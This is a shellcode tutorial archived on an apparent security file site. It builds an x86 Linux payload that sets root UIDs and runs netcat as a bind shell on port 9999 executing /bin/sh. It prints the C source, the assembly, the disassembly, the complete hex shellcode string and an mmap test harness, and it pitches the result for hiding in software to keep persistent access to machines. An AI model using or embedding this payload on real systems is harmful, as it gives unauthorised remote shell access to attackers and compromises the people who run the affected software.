what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Backdooring With Netcat Shellcode

Backdooring With Netcat Shellcode
Posted Dec 17, 2014
Authored by Florian MINDZSEC

Whitepaper called Backdooring with netcat shellcode.

tags | paper, shellcode
SHA-256 | 129c660032a03db2d31ed6b413d3a5690c54e1eb01214287aa2d5eb72dd5a23a

Backdooring With Netcat Shellcode

Change Mirror Download
         Backdooring Technique with Netcat(Shellcode version)
|=+++++++++++++++++++++++++++=[ Netcat as a shellcode ]=+++++++++++++++++++++++++++=|
|=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++=|
|=+++++++++++++++++++++++++++=[ flor_iano@hotmail.com ]=+++++++++++++++++++++++++++=|
|=+++++={Greetz to Str0ke, INFOSEC Institute, and to all who read this paper}=+++++=|

Disclaimer:Take Care!
Do not include this program to software, you can go in jail for abuse of privacy,
its a backdoor and you can be detected if you dont know what you do.

-----[ A Introduction - What is Netcat(SwissArmy Knife)?

Netcat is a unix utility wich read and writes data across network connections,
using TCP or UDP protocol. It is designed to be a reliable "back-end" tool that can
be used directly or easily driven by other programs && scripts. It is a feature-rich
network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. Netcat, or simply "nc" as the actual program is named shoud have been supplied long ago as another one of those cryptic but standart Unix tools.

Netcat is considered on top 20 Network debugging tools, it serve in several ways:
(1)It connects to a server.
(2)Is used as a backdoor.
(3)We get to transfer data(files) with commands.
(4)It can be connected at almost all of the TCP/IP's ports.
(5)ETC.

Nowadays the security administrators should (and is a "must" to)learn using netcat for his simplicity on connecting on others computers.In this paper i will show you the netcat shellcode so you can use it in your software to get a "back-end" port open and have a persistence access to a server or a computer you wish to access to.

-----[ Nasty work
Now, I as computer enthusiast and a software programmer have searched for weeks and weeks on geeting a shellcode for netcat becauze its very hard for this tool since it is a network debugging tool.
First of all we write two C program's to test the shellcode:

#include <stdio.h> //IO header
#include <string.h> //Functions on favor of strings
#include <stdlib.h> //exit() function
char shellcode[] = ""; /* Global array */
int main(int argc, char **argv)
{
int (*ret)(); /* ret is a func pointer*/
ret = (int(*)())shellcode; /* ret points to our shellcode */

(int)(*ret)(); /* shellcode is type caste as a function */
exit(0) /* exit() */
}

And the second program is about the mman.h tester program:

#include <stdio.h> //IO header
#include <sys/mman.h> //MMAN sys func
#include <string.h> //Functions on favor of strings
#include <stdlib.h> //Define Var types
#include <unistd.h> //Defines misc symbolic constants and types, and declares misc functions

int (*shellcodetotest)(); /* Global Variable type int, shellcodetotest is a func pointer */

char shellcode[] = ""; /* Global array */

int main(int argc, char **argv)
{
void *ptr = mmap(0, 150, PROT_EXEC | PROT_WRITE| PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0); /* Mmap functions passed to *ptr pointer */
if(ptr == MAP_FAILED)
{
perror("mmap"); /* Func to error of program */
exit(-1);
}

memcpy(ptr, shellcode, sizeof(shellcode)); /* Memcpy function */
shellcodetotest = ptr; /* Here we test the shellcode with mmap functions */
shellcodetotest(); /* Exec the shellcode */
return 0; /* return */
}

So what to do now:
(1) Prepare the C program to exec nc commands.
(2) Test it.
(3) Debug it.

root@MINDZSEC:~# nano ntcat.c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
int main()
{
setresuid(0,0,0); /* Set res UID 0 0 0 to all program */
char *envp[] = { NULL };
char *argv[] = {"/bin/nc", "-lvp9999", "-e/bin/sh", NULL};
int ret = execve("/bin/nc", argv, envp); /* exec the command */
}

Now we compile it:
root@MINDZSEC:~# gcc -S ntcat.c (-S switch for asm lang)
Assemble
root@MINDZSEC:~# as ntcat.s -o ntcat.o
Link it.
root@MINDZSEC:~# ld ntcat.o -o ntcat
Run it
root@MINDZSEC:~# ./ntcat
listening on [any] 9999 ...
Disassemble.
root@MINDZSEC:~# objdump -d ntcat.o

ntcat.o: file format elf32-i386


Disassembly of section .text:

00000000 <main>:
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: 83 e4 f0 and $0xfffffff0,%esp
6: 83 ec 30 sub $0x30,%esp
9: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp)
10: 00
11: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp)
18: 00
19: c7 04 24 00 00 00 00 movl $0x0,(%esp)
20: e8 fc ff ff ff call 21 <main+0x21>
25: c7 44 24 28 00 00 00 movl $0x0,0x28(%esp)
2c: 00
2d: c7 44 24 18 00 00 00 movl $0x0,0x18(%esp)
34: 00
35: c7 44 24 1c 08 00 00 movl $0x8,0x1c(%esp)
3c: 00
3d: c7 44 24 20 11 00 00 movl $0x11,0x20(%esp)
44: 00
45: c7 44 24 24 00 00 00 movl $0x0,0x24(%esp)
4c: 00
4d: 8d 44 24 28 lea 0x28(%esp),%eax
51: 89 44 24 08 mov %eax,0x8(%esp)
55: 8d 44 24 18 lea 0x18(%esp),%eax
59: 89 44 24 04 mov %eax,0x4(%esp)
5d: c7 04 24 00 00 00 00 movl $0x0,(%esp)
64: e8 fc ff ff ff call 65 <main+0x65>
69: 89 44 24 2c mov %eax,0x2c(%esp)
6d: c9 leave
6e: c3 ret
We can strace it to see what syscall's executing.
root@MINDZSEC:~# strace ./ntcat
execve("./ntcat", ["./ntcat"], [/* 31 vars */]) = 0
brk(0) = 0x9966000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7764000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=103011, ...}) = 0
mmap2(NULL, 103011, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb774a000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/i386-linux-gnu/i686/cmov/libc.so.6", O_RDONLY) = 3

Here we can see the firs syscall execve executing our program, followed by the opening of the dynamic linker/loader ld.so to load shared libraries.

The opcodes that are presented up have NULLS on it so we must remember a rule to get a shellcode done:
Remember to always use the smallest part of register possible to avoid null's, and xor is your friend.
So I accept that this C programm will not work and we dont have to test it - its simple his opcodes have nulls.So what to do, we go back
to assembly language (the most beautyfull programming language to program shellcodes.

Remember:
(1)You cant have nulls in your shellcode.
(2)You cant use static addresses in your shellcode.
(3)Xor is your friend.

Now get on asm programming language
root@MINDZSEC:~# nano ntcat.asm

jmp short todo
shellcode:
;from man setresuid: setresuid(uid_t ruid, uid_t euid, uid_t suid)
xor eax, eax ;Zero out eax
xor ebx, ebx ;Zero out ebx
xor ecx, ecx ;Zero out ecx
cdq ;Zero out edx using the sign bit from eax
mov BYTE al, 0xa4 ;setresuid syscall 164 (0xa4)
int 0x80 ;syscall execute
pop esi ;esi contain the string in db
xor eax, eax ;Zero out eax
mov[esi + 7], al ;null terminate /bin/nc
mov[esi + 16], al ;null terminate -lvp90
mov[esi + 26], al ;null terminate -e/bin/sh
mov[esi + 27], esi ;store address of /bin/nc in AAAA
lea ebx, [esi + 8] ;load address of -lvp90 into ebx
mov[esi +31], ebx ;store address of -lvp90 in BBB taken from ebx
lea ebx, [esi + 17] ;load address of -e/bin/sh into ebx
mov[esi + 35], ebx ;store address of -e/bin/sh in CCCC taken from ebx
mov[esi + 39], eax ;Zero out DDDD
mov al, 11 ;11 is execve syscakk number
mov ebx, esi ;store address of /bin/nc
lea ecx, [esi + 27] ;load address of ptr to argv[] array
lea edx, [esi + 39] ;envp[] NULL
int 0x80 ;syscall execute
todo:
call shellcode
db '/bin/nc#-lvp9999#-e/bin/sh#AAAABBBBCCCCDDDD'
; 01234567890123456789012345678901234567890123

So what we done here:
(1)We xor all the eac,ebx,ecx registers.
(2)We write the command in shellcode sections.
call shellcode
db '/bin/nc#-lvp9999#-e/bin/sh#AAAABBBBCCCCDDDD'
; 01234567890123456789012345678901234567890123
(3)We commented down of it number to have a focus on the command.
(4)Then do the dirty programm getting finished.

Now we compile it with nasm program
root@MINDZSEC:~# nasm -f elf ntcat.asm
Disassemble
root@MINDZSEC:~# objdump -d ntcat.o
ntcat.o: file format elf32-i386


Disassembly of section .text:

00000000 <shellcode-0x2>:
0: eb 35 jmp 37 <todo>

00000002 <shellcode>:
2: 31 c0 xor %eax,%eax
4: 31 db xor %ebx,%ebx
6: 31 c9 xor %ecx,%ecx
8: 99 cltd
9: b0 a4 mov $0xa4,%al
b: cd 80 int $0x80
d: 5e pop %esi
e: 31 c0 xor %eax,%eax
10: 88 46 07 mov %al,0x7(%esi)
13: 88 46 10 mov %al,0x10(%esi)
16: 88 46 1a mov %al,0x1a(%esi)
19: 89 76 1b mov %esi,0x1b(%esi)
1c: 8d 5e 08 lea 0x8(%esi),%ebx
1f: 89 5e 1f mov %ebx,0x1f(%esi)
22: 8d 5e 11 lea 0x11(%esi),%ebx
25: 89 5e 23 mov %ebx,0x23(%esi)
28: 89 46 27 mov %eax,0x27(%esi)
2b: b0 0b mov $0xb,%al
2d: 89 f3 mov %esi,%ebx
2f: 8d 4e 1b lea 0x1b(%esi),%ecx
32: 8d 56 27 lea 0x27(%esi),%edx
35: cd 80 int $0x80

00000037 <todo>:
37: e8 c6 ff ff ff call 2 <shellcode>
3c: 2f das
3d: 62 69 6e bound %ebp,0x6e(%ecx)
40: 2f das
41: 6e outsb %ds:(%esi),(%dx)
42: 63 23 arpl %sp,(%ebx)
44: 2d 6c 76 70 39 sub $0x3970766c,%eax
49: 39 39 cmp %edi,(%ecx)
4b: 39 23 cmp %esp,(%ebx)
4d: 2d 65 2f 62 69 sub $0x69622f65,%eax
52: 6e outsb %ds:(%esi),(%dx)
53: 2f das
54: 73 68 jae be <todo+0x87>
56: 23 41 41 and 0x41(%ecx),%eax
59: 41 inc %ecx
5a: 41 inc %ecx
5b: 42 inc %edx
5c: 42 inc %edx
5d: 42 inc %edx
5e: 42 inc %edx
5f: 43 inc %ebx
60: 43 inc %ebx
61: 43 inc %ebx
62: 43 inc %ebx
63: 44 inc %esp
64: 44 inc %esp
65: 44 inc %esp
66: 44 inc %esp

Here im not making test of running it because i am 100% clearance that it will work so lets gett the shellcode from this object file.
root@MINDZSEC:~# ./xxd-shellcode.sh ntcat.o "\xeb\x35\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x5e\x31\xc0\x88\x46\x07\x88\x46\x10\x88\x46\x1a\x89\x76\x1b\x8d\x5e\x08\x89\x5e\x1f\x8d\x5e\x11\x89\x5e\x23\x89\x46\x27\xb0\x0b\x89\xf3\x8d\x4e\x1b\x8d\x56\x27\xcd\x80\xe8\xc6\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x63\x23\x2d\x6c\x76\x70\x39\x39\x39\x39\x23\x2d\x65\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44"
This programm, damn it. We got with just a commannd :D..

Now it time to put this shellcode on mman.c test program,i used this because is a syscall function and can be simply works.But,
its not wrong to use the shellcode with the first test program, but mman involve on it, is like a=b b=c a=c so we have a look on strace sig.
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7764000
//Here we saw that mmap2 func is used to exec the program like wise it will do with the first c test programm.
Ok, since we put the shellcode in mman file now have a look on program:

root@MINDZSEC:~# nano Mmap.c

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

int (*shellcodetotest)();

char shellcode[] = "\xeb\x35\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x5e\x31\xc0\x88\x46\x07\x88\x46\x10\x88\x46\x1a\x89\x76\x1b\x8d\x5e\x08\x89\x5e\x1f\x8d\x5e\x11\x89\x5e\x23\x89\x46\x27\xb0\x0b\x89\xf3\x8d\x4e\x1b\x8d\x56\x27\xcd\x80\xe8\xc6\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x63\x23\x2d\x6c\x76\x70\x39\x39\x39\x39\x23\x2d\x65\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44";

int main(int argc, char **argv) {
void *ptr = mmap(0, 150, PROT_EXEC | PROT_WRITE| PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
if(ptr == MAP_FAILED){
perror("mmap");
exit(-1);
}

memcpy(ptr, shellcode, sizeof(shellcode));
shellcodetotest = ptr;
shellcodetotest();
return 0;
}

root@MINDZSEC:~# gcc Mmap.c -o Mmap
Run
root@MINDZSEC:~# ./Mmap
listening on [any] 9999 ...

Hey we see its listening on port 9999, i used this port on ntcat.asm programm so its working.The assembly is all pretty understendable until you get down to
the main.There is many ways to make his program more efficent and workable,i simply learnt much about shellcoding and came to this step.This paper can save you lots of time
for making a netcat shellcode, just watch all the paper carefully and see were is your difficulty.Since i exposed my email you can contact on me to answer your questions if you have.
I dont used gdb here cuz with this i meant that the reader who will see this paper can understand programming and its functions.

In someplace in this paper i have include A file called xxd-shellcode.sh it saved me lot of time(5mins) to get the opcodes done:
here you have it:
#!/bin/bash

filename=`echo $1 | sed s/"\.o$"//`
rm -f $filename.shellcode
objdump -d $filename.o | grep '[0-9a-f]:' | grep -v 'file' | cut -f2 -d: | cut -f1-6 -d' ' | tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\x/g' | paste -d '' -s | sed 's/^/"/' | sed 's/$/"/g'
echo

Copy it and test it and dont change nothing, anyway you can find this on projectshellcode.com

My Pseudoname is MINDZSEC(flor ian) and i love doing "SHELLCODE".
My another article I think could be "Smashing the stack By me"

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close